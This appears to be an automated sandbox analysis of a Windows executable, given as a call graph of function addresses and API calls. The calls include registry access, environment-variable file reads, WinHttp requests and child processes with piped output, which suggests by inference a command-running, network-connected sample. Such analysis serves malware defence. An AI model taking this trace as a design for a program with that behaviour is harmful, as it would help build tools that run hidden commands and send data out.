4150->4151 4152 7ff6f2d67888 4151->4152 4153 7ff6f2d61990 4 API calls 4152->4153 4154 7ff6f2d67893 4153->4154 4155 7ff6f2d61990 4 API calls 4154->4155 4156 7ff6f2d678a2 4155->4156 4164 7ff6f2d67034 4156->4164 4159 7ff6f2d61990 4 API calls 4160 7ff6f2d678d5 4159->4160 4160->4119 4162 7ff6f2d67116 CoUninitialize 4161->4162 4166 7ff6f2d67079 4164->4166 4165 7ff6f2d6707d 4165->4159 4166->4165 4168 7ff6f2d66004 4166->4168 4169 7ff6f2d6601a 4168->4169 4172 7ff6f2d67234 4169->4172 4181 7ff6f2d67310 4172->4181 4175 7ff6f2d66042 4176 7ff6f2d67260 4179 7ff6f2d61990 4 API calls 4176->4179 4177 7ff6f2d61990 4 API calls 4178 7ff6f2d67275 4177->4178 4180 7ff6f2d619e4 4 API calls 4178->4180 4179->4175 4180->4176 4182 7ff6f2d6733e 4181->4182 4183 7ff6f2d67362 4182->4183 4184 7ff6f2d67381 4182->4184 4187 7ff6f2d61a70 5 API calls 4183->4187 4185 7ff6f2d673bb 4184->4185 4191 7ff6f2d67395 4184->4191 4186 7ff6f2d61990 4 API calls 4185->4186 4188 7ff6f2d673ca 4186->4188 4190 7ff6f2d67251 4187->4190 4189 7ff6f2d61990 4 API calls 4188->4189 4192 7ff6f2d673d5 4189->4192 4190->4175 4190->4176 4190->4177 4193 7ff6f2d61a70 5 API calls 4191->4193 4194 7ff6f2d61990 4 API calls 4192->4194 4193->4190 4194->4190 4937 7ff6f2d661f8 4938 7ff6f2d6620e 4937->4938 4939 7ff6f2d67234 5 API calls 4938->4939 4940 7ff6f2d6623c 4939->4940 4941 7ff6f2d67234 5 API calls 4940->4941 4942 7ff6f2d6625c 4941->4942 4493 7ff6f2d631c4 4494 7ff6f2d631d7 4493->4494 4495 7ff6f2d61990 4 API calls 4494->4495 4496 7ff6f2d631e2 4495->4496 4497 7ff6f2d61990 4 API calls 4496->4497 4498 7ff6f2d631f1 CertEnumSystemStoreLocation 4497->4498 4499 7ff6f2d61990 4 API calls 4498->4499 4500 7ff6f2d63215 4499->4500 4959 7ff6f2d6dc0c 4960 7ff6f2d6dc60 4959->4960 4961 7ff6f2d61990 4 API calls 4960->4961 4962 7ff6f2d6dc96 4961->4962 4963 7ff6f2d61990 4 API calls 4962->4963 4964 7ff6f2d6dcad 4963->4964 5087 7ff6f2d6cbf4 RegOpenKeyExW 4964->5087 4966 7ff6f2d6dccd 4967 7ff6f2d61990 4 API calls 4966->4967 4968 7ff6f2d6dd30 4967->4968 4969 7ff6f2d61990 4 API calls 4968->4969 4970 7ff6f2d6dd47 4969->4970 4971 7ff6f2d6ccf8 6 API calls 4970->4971 4972 7ff6f2d6dd6c 4971->4972 4973 7ff6f2d6deb3 4972->4973 4976 7ff6f2d6dd80 PathCombineW PathFileExistsW 4972->4976 4974 7ff6f2d61990 4 API calls 4973->4974 4975 7ff6f2d6dec2 4974->4975 4981 7ff6f2d61990 4 API calls 4975->4981 4977 7ff6f2d6dda6 PathQuoteSpacesW 4976->4977 5009 7ff6f2d6dea0 4976->5009 5093 7ff6f2d6cff0 4977->5093 4979 7ff6f2d625b4 2 API calls 4979->4973 4980 7ff6f2d6ddbc lstrcatW 5095 7ff6f2d6e8a4 4980->5095 4983 7ff6f2d6ded9 4981->4983 4985 7ff6f2d6cbf4 4 API calls 4983->4985 4987 7ff6f2d6def2 4985->4987 4986 7ff6f2d69644 2 API calls 4989 7ff6f2d6dde6 4986->4989 4988 7ff6f2d61990 4 API calls 4987->4988 4990 7ff6f2d6df0e 4988->4990 4989->4989 4992 7ff6f2d6900c 16 API calls 4989->4992 4991 7ff6f2d61990 4 API calls 4990->4991 4993 7ff6f2d6df1d 4991->4993 4994 7ff6f2d6de3b 4992->4994 4995 7ff6f2d61990 4 API calls 4993->4995 4996 7ff6f2d695a0 8 API calls 4994->4996 4999 7ff6f2d6de81 4994->4999 4997 7ff6f2d6df34 4995->4997 4998 7ff6f2d6de50 4996->4998 5002 7ff6f2d6df40 GetEnvironmentVariableW 4997->5002 5000 7ff6f2d6de77 4998->5000 5001 7ff6f2d697dc 16 API calls 4998->5001 5007 7ff6f2d625b4 2 API calls 4999->5007 5003 7ff6f2d69478 13 API calls 5000->5003 5004 7ff6f2d6de64 5001->5004 5005 7ff6f2d6df69 5002->5005 5006 7ff6f2d6e1e7 5002->5006 5003->4999 5004->5000 5010 7ff6f2d61990 4 API calls 5004->5010 5011 7ff6f2d6df75 PathAppendW PathFileExistsW 5005->5011 5008 7ff6f2d61990 4 API calls 5006->5008 5007->5009 5012 7ff6f2d6e1f6 5008->5012 5009->4979 5010->5000 5011->5006 5013 7ff6f2d6df9a CreateFileW 5011->5013 5015 7ff6f2d61990 4 API calls 5012->5015 5013->5006 5014 7ff6f2d6dfcf GetFileSize 5013->5014 5102 7ff6f2d625dc GetProcessHeap HeapAlloc 5014->5102 5017 7ff6f2d6e20d 5015->5017 5019 7ff6f2d6cbf4 4 API calls 5017->5019 5022 7ff6f2d6e22a 5019->5022 5025 7ff6f2d61990 4 API calls 5022->5025 5028 7ff6f2d6e246 5025->5028 5031 7ff6f2d61990 4 API calls 5028->5031 5034 7ff6f2d6e25d 5031->5034 5036 7ff6f2d6e269 GetEnvironmentVariableW 5034->5036 5038 7ff6f2d6e37c 5036->5038 5039 7ff6f2d6e28c 5036->5039 5040 7ff6f2d61990 4 API calls 5038->5040 5041 7ff6f2d6e298 PathAppendW PathFileExistsW 5039->5041 5042 7ff6f2d6e38b 5040->5042 5041->5038 5045 7ff6f2d6e2bd CreateFileW 5041->5045 5046 7ff6f2d61990 4 API calls 5042->5046 5045->5038 5049 7ff6f2d6e2f2 GetFileSize 5045->5049 5050 7ff6f2d6e39a 5046->5050 5103 7ff6f2d62588 GetProcessHeap HeapAlloc 5049->5103 5088 7ff6f2d6ccd7 5087->5088 5089 7ff6f2d6cc47 RegEnumKeyExW 5087->5089 5088->4966 5090 7ff6f2d6cccc RegCloseKey 5089->5090 5091 7ff6f2d6cc7d RegEnumKeyExW 5089->5091 5090->5088 5091->5090 5094 7ff6f2d6d04b 5093->5094 5094->4980 5096 7ff6f2d6e7cc 2 API calls 5095->5096 5097 7ff6f2d6e8c3 5096->5097 5104 7ff6f2d6e750 5097->5104 5100 7ff6f2d6e6dc 4 API calls 5101 7ff6f2d6ddd9 5100->5101 5101->4986 5105 7ff6f2d6e797 5104->5105 5107 7ff6f2d6e76b 5104->5107 5105->5100 5106 7ff6f2d6e6dc 4 API calls 5106->5107 5107->5105 5107->5106 5108 7ff6f2d6250c 5113 7ff6f2d6213c 5108->5113 5111 7ff6f2d6253b 5156 7ff6f2d61c80 5113->5156 5116 7ff6f2d625b4 2 API calls 5117 7ff6f2d6219e 5116->5117 5118 7ff6f2d624e6 5117->5118 5119 7ff6f2d621ba WinHttpCrackUrl 5117->5119 5118->5111 5145 7ff6f2d61eec 5118->5145 5120 7ff6f2d624dd WinHttpCloseHandle 5119->5120 5121 7ff6f2d621e6 5119->5121 5120->5118 5122 7ff6f2d621f7 WinHttpConnect 5121->5122 5122->5120 5123 7ff6f2d62225 5122->5123 5123->5123 5124 7ff6f2d6228b WinHttpOpenRequest 5123->5124 5125 7ff6f2d622ba 5124->5125 5126 7ff6f2d624cd WinHttpCloseHandle 5124->5126 5127 7ff6f2d62304 WinHttpSendRequest 5125->5127 5128 7ff6f2d622c0 WinHttpQueryOption WinHttpSetOption 5125->5128 5126->5120 5129 7ff6f2d6232b WinHttpReceiveResponse 5127->5129 5130 7ff6f2d624c4 WinHttpCloseHandle 5127->5130 5128->5127 5129->5130 5131 7ff6f2d6233e 5129->5131 5130->5126 5132 7ff6f2d6e7cc 2 API calls 5131->5132 5133 7ff6f2d6234d WinHttpQueryDataAvailable 5132->5133 5134 7ff6f2d6e6dc 4 API calls 5133->5134 5135 7ff6f2d6236d WinHttpReadData 5134->5135 5136 7ff6f2d6238b 5135->5136 5136->5133 5137 7ff6f2d6e72c 4 API calls 5136->5137 5139 7ff6f2d6239f 5136->5139 5137->5136 5138 7ff6f2d624ba 5138->5130 5139->5138 5160 7ff6f2d67a60 5139->5160 5184 7ff6f2d61de8 5145->5184 5148 7ff6f2d61f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 5150 7ff6f2d6262c 5148->5150 5149 7ff6f2d62121 5149->5111 5151 7ff6f2d61fa8 SafeArrayUnaccessData 5150->5151 5153 7ff6f2d61fd9 5151->5153 5154 7ff6f2d61ffe SysFreeString 5153->5154 5155 7ff6f2d61cbc 11 API calls 5153->5155 5154->5149 5155->5154 5157 7ff6f2d61ca1 5156->5157 5158 7ff6f2d61ca5 WinHttpOpen 5157->5158 5159 7ff6f2d679f0 2 API calls 5157->5159 5158->5116 5159->5158 5161 7ff6f2d67a84 5160->5161 5163 7ff6f2d624a5 5160->5163 5172 7ff6f2d625dc GetProcessHeap HeapAlloc 5161->5172 5164 7ff6f2d61cbc 5163->5164 5173 7ff6f2d6a520 5164->5173 5174 7ff6f2d6a551 5173->5174 5183 7ff6f2d625dc GetProcessHeap HeapAlloc 5174->5183 5190 7ff6f2d61b74 5184->5190 5186 7ff6f2d61e06 RegCreateKeyExA 5187 7ff6f2d61e3f CoInitializeEx VariantInit CoCreateInstance 5186->5187 5188 7ff6f2d61e46 5186->5188 5187->5148 5187->5149 5188->5188 5189 7ff6f2d61ea2 RegSetValueExA RegCloseKey 5188->5189 5189->5187 5191 7ff6f2d61bc3 5190->5191 5191->5186 4195 7ff6f2d69ac8 4196 7ff6f2d69af7 4195->4196 4197 7ff6f2d61990 4 API calls 4196->4197 4198 7ff6f2d69b02 4197->4198 4332 7ff6f2d69644 4198->4332 4200 7ff6f2d69b0b 4200->4200 4337 7ff6f2d6900c 4200->4337 4203 7ff6f2d6a4e7 4205 7ff6f2d61990 4 API calls 4203->4205 4206 7ff6f2d6a4ff 4205->4206 4207 7ff6f2d69b7d 4207->4203 4372 7ff6f2d697dc 4207->4372 4210 7ff6f2d61990 4 API calls 4211 7ff6f2d69bb7 4210->4211 4212 7ff6f2d697dc 16 API calls 4211->4212 4213 7ff6f2d69bcf 4212->4213 4213->4203 4214 7ff6f2d61990 4 API calls 4213->4214 4215 7ff6f2d69be2 4214->4215 4216 7ff6f2d697dc 16 API calls 4215->4216 4217 7ff6f2d69bfa 4216->4217 4217->4203 4218 7ff6f2d61990 4 API calls 4217->4218 4219 7ff6f2d69c0d 4218->4219 4220 7ff6f2d697dc 16 API calls 4219->4220 4221 7ff6f2d69c25 4220->4221 4221->4203 4222 7ff6f2d61990 4 API calls 4221->4222 4223 7ff6f2d69c38 4222->4223 4224 7ff6f2d697dc 16 API calls 4223->4224 4225 7ff6f2d69c50 4224->4225 4225->4203 4226 7ff6f2d61990 4 API calls 4225->4226 4227 7ff6f2d69c63 4226->4227 4228 7ff6f2d697dc 16 API calls 4227->4228 4229 7ff6f2d69c7b 4228->4229 4229->4203 4230 7ff6f2d61990 4 API calls 4229->4230 4231 7ff6f2d69c8e 4230->4231 4232 7ff6f2d697dc 16 API calls 4231->4232 4233 7ff6f2d69ca6 4232->4233 4233->4203 4234 7ff6f2d61990 4 API calls 4233->4234 4235 7ff6f2d69cb9 4234->4235 4236 7ff6f2d697dc 16 API calls 4235->4236 4237 7ff6f2d69cd1 4236->4237 4237->4203 4238 7ff6f2d61990 4 API calls 4237->4238 4239 7ff6f2d69ce4 4238->4239 4240 7ff6f2d697dc 16 API calls 4239->4240 4241 7ff6f2d69cfc 4240->4241 4241->4203 4242 7ff6f2d61990 4 API calls 4241->4242 4243 7ff6f2d69d0f 4242->4243 4244 7ff6f2d697dc 16 API calls 4243->4244 4245 7ff6f2d69d27 4244->4245 4245->4203 4246 7ff6f2d61990 4 API calls 4245->4246 4247 7ff6f2d69d3a 4246->4247 4248 7ff6f2d697dc 16 API calls 4247->4248 4249 7ff6f2d69d52 4248->4249 4249->4203 4250 7ff6f2d61990 4 API calls 4249->4250 4251 7ff6f2d69d65 4250->4251 4252 7ff6f2d697dc 16 API calls 4251->4252 4253 7ff6f2d69d7d 4252->4253 4253->4203 4254 7ff6f2d61990 4 API calls 4253->4254 4255 7ff6f2d69d90 4254->4255 4256 7ff6f2d697dc 16 API calls 4255->4256 4257 7ff6f2d69da8 4256->4257 4257->4203 4258 7ff6f2d61990 4 API calls 4257->4258 4259 7ff6f2d69dbb 4258->4259 4260 7ff6f2d697dc 16 API calls 4259->4260 4261 7ff6f2d69dd3 4260->4261 4261->4203 4262 7ff6f2d61990 4 API calls 4261->4262 4263 7ff6f2d69de6 4262->4263 4263->4263 4264 7ff6f2d697dc 16 API calls 4263->4264 4265 7ff6f2d69e4c 4264->4265 4265->4203 4266 7ff6f2d61990 4 API calls 4265->4266 4267 7ff6f2d69e5f 4266->4267 4267->4267 4268 7ff6f2d697dc 16 API calls 4267->4268 4269 7ff6f2d69eba 4268->4269 4269->4203 4270 7ff6f2d61990 4 API calls 4269->4270 4271 7ff6f2d69ecd 4270->4271 4271->4271 4272 7ff6f2d697dc 16 API calls 4271->4272 4273 7ff6f2d69f2f 4272->4273 4273->4203 4274 7ff6f2d61990 4 API calls 4273->4274 4275 7ff6f2d69f42 4274->4275 4275->4275 4276 7ff6f2d697dc 16 API calls 4275->4276 4277 7ff6f2d69f99 4276->4277 4277->4203 4278 7ff6f2d61990 4 API calls 4277->4278 4279 7ff6f2d69fac 4278->4279 4279->4279 4280 7ff6f2d697dc 16 API calls 4279->4280 4281 7ff6f2d6a002 4280->4281 4281->4203 4282 7ff6f2d61990 4 API calls 4281->4282 4283 7ff6f2d6a015 4282->4283 4283->4283 4284 7ff6f2d697dc 16 API calls 4283->4284 4285 7ff6f2d6a072 4284->4285 4285->4203 4286 7ff6f2d61990 4 API calls 4285->4286 4287 7ff6f2d6a085 4286->4287 4287->4287 4288 7ff6f2d697dc 16 API calls 4287->4288 4289 7ff6f2d6a0db 4288->4289 4289->4203 4290 7ff6f2d61990 4 API calls 4289->4290 4291 7ff6f2d6a0ee 4290->4291 4291->4291 4292 7ff6f2d697dc 16 API calls 4291->4292 4293 7ff6f2d6a14b 4292->4293 4293->4203 4294 7ff6f2d61990 4 API calls 4293->4294 4295 7ff6f2d6a162 4294->4295 4295->4295 4296 7ff6f2d697dc 16 API calls 4295->4296 4297 7ff6f2d6a1bb 4296->4297 4297->4203 4298 7ff6f2d61990 4 API calls 4297->4298 4299 7ff6f2d6a1d2 4298->4299 4299->4299 4300 7ff6f2d697dc 16 API calls 4299->4300 4301 7ff6f2d6a221 4300->4301 4301->4203 4302 7ff6f2d61990 4 API calls 4301->4302 4303 7ff6f2d6a238 4302->4303 4303->4303 4304 7ff6f2d697dc 16 API calls 4303->4304 4305 7ff6f2d6a289 4304->4305 4305->4203 4306 7ff6f2d61990 4 API calls 4305->4306 4307 7ff6f2d6a2a0 4306->4307 4307->4307 4308 7ff6f2d697dc 16 API calls 4307->4308 4309 7ff6f2d6a2e6 4308->4309 4309->4203 4310 7ff6f2d61990 4 API calls 4309->4310 4311 7ff6f2d6a2fd 4310->4311 4311->4311 4312 7ff6f2d697dc 16 API calls 4311->4312 4313 7ff6f2d6a34b 4312->4313 4313->4203 4314 7ff6f2d61990 4 API calls 4313->4314 4315 7ff6f2d6a365 4314->4315 4315->4315 4316 7ff6f2d697dc 16 API calls 4315->4316 4317 7ff6f2d6a3af 4316->4317 4317->4203 4318 7ff6f2d61990 4 API calls 4317->4318 4319 7ff6f2d6a3c2 4318->4319 4319->4319 4320 7ff6f2d697dc 16 API calls 4319->4320 4321 7ff6f2d6a423 4320->4321 4321->4203 4322 7ff6f2d61990 4 API calls 4321->4322 4323 7ff6f2d6a436 4322->4323 4323->4323 4324 7ff6f2d697dc 16 API calls 4323->4324 4325 7ff6f2d6a485 4324->4325 4325->4203 4326 7ff6f2d61990 4 API calls 4325->4326 4327 7ff6f2d6a494 4326->4327 4327->4327 4328 7ff6f2d697dc 16 API calls 4327->4328 4329 7ff6f2d6a4da 4328->4329 4329->4203 4330 7ff6f2d6a4de 4329->4330 4421 7ff6f2d69478 4330->4421 4437 7ff6f2d6e7cc 4332->4437 4335 7ff6f2d6e7cc 2 API calls 4336 7ff6f2d69672 4335->4336 4336->4200 4441 7ff6f2d62554 4337->4441 4340 7ff6f2d69069 4345 7ff6f2d61990 4 API calls 4340->4345 4341 7ff6f2d690a3 CreatePipe 4342 7ff6f2d690e8 CreatePipe 4341->4342 4343 7ff6f2d690c1 4341->4343 4344 7ff6f2d69106 4342->4344 4351 7ff6f2d69130 4342->4351 4346 7ff6f2d61990 4 API calls 4343->4346 4350 7ff6f2d61990 4 API calls 4344->4350 4347 7ff6f2d6907d GetLastError 4345->4347 4348 7ff6f2d690d5 GetLastError 4346->4348 4349 7ff6f2d6908e 4347->4349 4348->4349 4354 7ff6f2d61a70 5 API calls 4349->4354 4352 7ff6f2d6911a GetLastError 4350->4352 4443 7ff6f2d67cfc 4351->4443 4352->4349 4356 7ff6f2d6909c 4354->4356 4355 7ff6f2d6917b CreateProcessW 4357 7ff6f2d625b4 2 API calls 4355->4357 4356->4203 4364 7ff6f2d695a0 WaitForSingleObject 4356->4364 4358 7ff6f2d691c7 4357->4358 4359 7ff6f2d691cb 4358->4359 4360 7ff6f2d691f5 CloseHandle 4358->4360 4361 7ff6f2d61990 4 API calls 4359->4361 4360->4356 4362 7ff6f2d691df GetLastError 4361->4362 4363 7ff6f2d691f0 4362->4363 4363->4360 4365 7ff6f2d695c3 4364->4365 4370 7ff6f2d69600 4364->4370 4366 7ff6f2d695d4 4365->4366 4448 7ff6f2d6968c PeekNamedPipe 4365->4448 4367 7ff6f2d695ee GetExitCodeProcess 4366->4367 4369 7ff6f2d6968c 6 API calls 4366->4369 4366->4370 4367->4370 4371 7ff6f2d695ea 4369->4371 4370->4207 4371->4367 4371->4370 4373 7ff6f2d61990 4 API calls 4372->4373 4374 7ff6f2d69813 4373->4374 4374->4374 4375 7ff6f2d61990 4 API calls 4374->4375 4376 7ff6f2d69877 4375->4376 4377 7ff6f2d679f0 2 API calls 4376->4377 4378 7ff6f2d6987f 4377->4378 4379 7ff6f2d619e4 4 API calls 4378->4379 4380 7ff6f2d6988d 4379->4380 4381 7ff6f2d625b4 2 API calls 4380->4381 4382 7ff6f2d69895 4381->4382 4383 7ff6f2d61990 4 API calls 4382->4383 4384 7ff6f2d698a4 4383->4384 4462 7ff6f2d69224 GetSystemTimeAsFileTime 4384->4462 4387 7ff6f2d6e6dc 4 API calls 4388 7ff6f2d698cd 4387->4388 4389 7ff6f2d6e6dc 4 API calls 4388->4389 4390 7ff6f2d698ed 4389->4390 4391 7ff6f2d699cf 4390->4391 4392 7ff6f2d61990 4 API calls 4390->4392 4393 7ff6f2d61a70 5 API calls 4391->4393 4394 7ff6f2d6993f 4392->4394 4395 7ff6f2d699ef 4393->4395 4397 7ff6f2d69943 4394->4397 4398 7ff6f2d69950 4394->4398 4396 7ff6f2d61990 4 API calls 4395->4396 4400 7ff6f2d699fe 4396->4400 4399 7ff6f2d619e4 4 API calls 4397->4399 4401 7ff6f2d679f0 2 API calls 4398->4401 4402 7ff6f2d6994e 4399->4402 4400->4203 4400->4210 4403 7ff6f2d69958 4401->4403 4406 7ff6f2d61990 4 API calls 4402->4406 4404 7ff6f2d619e4 4 API calls 4403->4404 4405 7ff6f2d69966 4404->4405 4407 7ff6f2d625b4 2 API calls 4405->4407 4408 7ff6f2d6997d 4406->4408 4407->4402 4409 7ff6f2d61990 4 API calls 4408->4409 4410 7ff6f2d69991 4409->4410 4411 7ff6f2d69995 4410->4411 4412 7ff6f2d699a2 4410->4412 4413 7ff6f2d619e4 4 API calls 4411->4413 4414 7ff6f2d679f0 2 API calls 4412->4414 4415 7ff6f2d699a0 4413->4415 4416 7ff6f2d699aa 4414->4416 4419 7ff6f2d61990 4 API calls 4415->4419 4417 7ff6f2d619e4 4 API calls 4416->4417 4418 7ff6f2d699b8 4417->4418 4420 7ff6f2d625b4 2 API calls 4418->4420 4419->4391 4420->4415 4483 7ff6f2d6971c 4421->4483 4424 7ff6f2d6968c 6 API calls 4429 7ff6f2d694cf 4424->4429 4425 7ff6f2d694fc WaitForSingleObject 4426 7ff6f2d6954d 4425->4426 4427 7ff6f2d69512 GetSystemTimeAsFileTime 4425->4427 4428 7ff6f2d69540 4426->4428 4430 7ff6f2d69563 4426->4430 4431 7ff6f2d6968c 6 API calls 4426->4431 4427->4429 4428->4203 4429->4424 4429->4425 4429->4428 4435 7ff6f2d69534 TerminateProcess 4429->4435 4430->4428 4432 7ff6f2d6957d GetExitCodeProcess 4430->4432 4433 7ff6f2d6968c 6 API calls 4430->4433 4431->4430 4432->4428 4434 7ff6f2d6958f CloseHandle 4432->4434 4436 7ff6f2d69579 4433->4436 4434->4428 4435->4428 4436->4428 4436->4432 4440 7ff6f2d625dc GetProcessHeap HeapAlloc 4437->4440 4439 7ff6f2d6965f 4439->4335 4442 7ff6f2d62561 CreatePipe 4441->4442 4442->4340 4442->4341 4444 7ff6f2d67d0e 4443->4444 4447 7ff6f2d625dc GetProcessHeap HeapAlloc 4444->4447 4446 7ff6f2d67d1d 4446->4355 4449 7ff6f2d696c2 4448->4449 4454 7ff6f2d696ca 4448->4454 4449->4454 4455 7ff6f2d6e6dc 4449->4455 4452 7ff6f2d69701 4459 7ff6f2d6e72c 4452->4459 4454->4366 4456 7ff6f2d696dc ReadFile 4455->4456 4457 7ff6f2d6e6f9 4455->4457 4456->4452 4456->4454 4457->4457 4458 7ff6f2d62654 4 API calls 4457->4458 4458->4456 4460 7ff6f2d6e6dc 4 API calls 4459->4460 4461 7ff6f2d6e741 4460->4461 4461->4454 4463 7ff6f2d69264 4462->4463 4482 7ff6f2d625dc GetProcessHeap HeapAlloc 4463->4482 4465 7ff6f2d692b1 4466 7ff6f2d6971c WriteFile 4465->4466 4467 7ff6f2d692fe 4466->4467 4468 7ff6f2d625b4 GetProcessHeap RtlFreeHeap 4467->4468 4472 7ff6f2d69306 4468->4472 4469 7ff6f2d6968c 6 API calls 4469->4472 4470 7ff6f2d693a2 WaitForSingleObject 4471 7ff6f2d693f5 4470->4471 4473 7ff6f2d693b8 GetSystemTimeAsFileTime 4470->4473 4471->4387 4472->4469 4472->4470 4472->4471 4474 7ff6f2d69418 WaitForSingleObject 4472->4474 4477 7ff6f2d693e9 TerminateProcess 4472->4477 4473->4472 4474->4471 4475 7ff6f2d6942e 4474->4475 4476 7ff6f2d6943e 4475->4476 4478 7ff6f2d6968c 6 API calls 4475->4478 4476->4471 4479 7ff6f2d69458 GetExitCodeProcess 4476->4479 4480 7ff6f2d6968c 6 API calls 4476->4480 4477->4471 4478->4476 4479->4471 4481 7ff6f2d69454 4480->4481 4481->4471 4481->4479 4485 7ff6f2d6974b 4483->4485 4486 7ff6f2d694ba GetSystemTimeAsFileTime 4485->4486 4487 7ff6f2d697a4 WriteFile 4485->4487 4486->4429 4488 7ff6f2d697c7 4487->4488 4488->4485 5192 7ff6f2d6ec08 5193 7ff6f2d6ec33 5192->5193 5194 7ff6f2d6ec1f 5192->5194 5198 7ff6f2d625dc GetProcessHeap HeapAlloc 5194->5198 5214 7ff6f2d6e4d4 lstrcpyW PathAppendW 5215 7ff6f2d6e520 5214->5215 5216 7ff6f2d6ccf8 6 API calls 5215->5216 5218 7ff6f2d6e53b 5216->5218 5217 7ff6f2d6e5ee 5218->5217 5219 7ff6f2d61990 4 API calls 5218->5219 5220 7ff6f2d6e55a 5219->5220 5221 7ff6f2d619e4 4 API calls 5220->5221 5222 7ff6f2d6e565 5221->5222 5223 7ff6f2d61990 4 API calls 5222->5223 5224 7ff6f2d6e57c 5223->5224 5225 7ff6f2d619e4 4 API calls 5224->5225 5226 7ff6f2d6e58b 5225->5226 5227 7ff6f2d61990 4 API calls 5226->5227 5228 7ff6f2d6e5e2 5227->5228 5229 7ff6f2d625b4 2 API calls 5228->5229 5229->5217 5237 7ff6f2d66b94 5238 7ff6f2d66bbf 5237->5238 5239 7ff6f2d67234 5 API calls 5238->5239 5240 7ff6f2d66c2e 5239->5240 5241 7ff6f2d67234 5 API calls 5240->5241 5242 7ff6f2d66c9d 5241->5242 5243 7ff6f2d67234 5 API calls 5242->5243 5244 7ff6f2d66d09 5243->5244 5245 7ff6f2d614d4 5246 7ff6f2d614ea 5245->5246 5247 7ff6f2d61507 5245->5247 5246->5247 5248 7ff6f2d61501 RemoveVectoredExceptionHandler 5246->5248 5248->5247 5249 7ff6f2d668d4 5250 7ff6f2d668f7 5249->5250 5251 7ff6f2d67234 5 API calls 5250->5251 5252 7ff6f2d66971 5251->5252 5253 7ff6f2d67234 5 API calls 5252->5253 5254 7ff6f2d66990 5253->5254 5255 7ff6f2d67234 5 API calls 5254->5255 5256 7ff6f2d669af 5255->5256 5257 7ff6f2d672d4 5 API calls 5256->5257 5258 7ff6f2d669ce 5257->5258 5259 7ff6f2d66054 5260 7ff6f2d66077 5259->5260 5261 7ff6f2d67234 5 API calls 5260->5261 5262 7ff6f2d660f1 5261->5262 5263 7ff6f2d67234 5 API calls 5262->5263 5264 7ff6f2d66110 5263->5264 5265 7ff6f2d67234 5 API calls 5264->5265 5266 7ff6f2d6612f 5265->5266 5267 7ff6f2d67234 5 API calls 5266->5267 5268 7ff6f2d6619e 5267->5268 5269 7ff6f2d67234 5 API calls 5268->5269 5270 7ff6f2d661bd 5269->5270 5271 7ff6f2d672d4 5 API calls 5270->5271 5272 7ff6f2d661dc 5271->5272

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00007FF6F2D69224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158synchronizationtimeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 129 7ff6f2d69224-7ff6f2d69306 GetSystemTimeAsFileTime call 7ff6f2d69a20 * 3 call 7ff6f2d69a98 call 7ff6f2d62698 call 7ff6f2d625dc call 7ff6f2d67b34 * 4 call 7ff6f2d6971c call 7ff6f2d625b4 154 7ff6f2d69309-7ff6f2d69317 129->154 155 7ff6f2d69329-7ff6f2d69330 154->155 156 7ff6f2d69319-7ff6f2d6931c call 7ff6f2d6968c 154->156 157 7ff6f2d6938c-7ff6f2d69393 155->157 158 7ff6f2d69332-7ff6f2d69335 155->158 163 7ff6f2d69321-7ff6f2d69323 156->163 161 7ff6f2d69395-7ff6f2d69399 call 7ff6f2d6968c 157->161 162 7ff6f2d693a2-7ff6f2d693b6 WaitForSingleObject 157->162 158->157 160 7ff6f2d69337-7ff6f2d69351 158->160 165 7ff6f2d69382-7ff6f2d69386 160->165 166 7ff6f2d69353-7ff6f2d69365 call 7ff6f2d67b50 160->166 172 7ff6f2d6939e-7ff6f2d693a0 161->172 164 7ff6f2d693f5 162->164 168 7ff6f2d693b8-7ff6f2d693ca GetSystemTimeAsFileTime 162->168 163->155 163->164 169 7ff6f2d693f7-7ff6f2d69417 164->169 165->157 171 7ff6f2d69418-7ff6f2d6942c WaitForSingleObject 165->171 178 7ff6f2d69367-7ff6f2d6936e 166->178 179 7ff6f2d69374-7ff6f2d69380 166->179 168->154 173 7ff6f2d693d0-7ff6f2d693e3 call 7ff6f2d69a98 168->173 171->164 176 7ff6f2d6942e-7ff6f2d69434 171->176 172->162 172->164 173->154 182 7ff6f2d693e9-7ff6f2d693ef TerminateProcess 173->182 180 7ff6f2d69436-7ff6f2d69439 call 7ff6f2d6968c 176->180 181 7ff6f2d69442-7ff6f2d69449 176->181 178->171 178->179 179->165 179->166 186 7ff6f2d6943e-7ff6f2d69440 180->186 184 7ff6f2d6944b-7ff6f2d6944f call 7ff6f2d6968c 181->184 185 7ff6f2d69458-7ff6f2d69468 GetExitCodeProcess 181->185 182->164 190 7ff6f2d69454-7ff6f2d69456 184->190 188 7ff6f2d6946a-7ff6f2d69471 185->188 189 7ff6f2d69473-7ff6f2d69475 185->189 186->164 186->181 188->164 188->189 189->169 190->164 190->185
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D6924D
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D693AB
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D693C0
                                                                                                                                        • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D693EF
                                                                                                                                          • Part of subcall function 00007FF6F2D6968C: PeekNamedPipe.KERNELBASE ref: 00007FF6F2D696B8
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D69421
                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00007FF6F2D69460
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
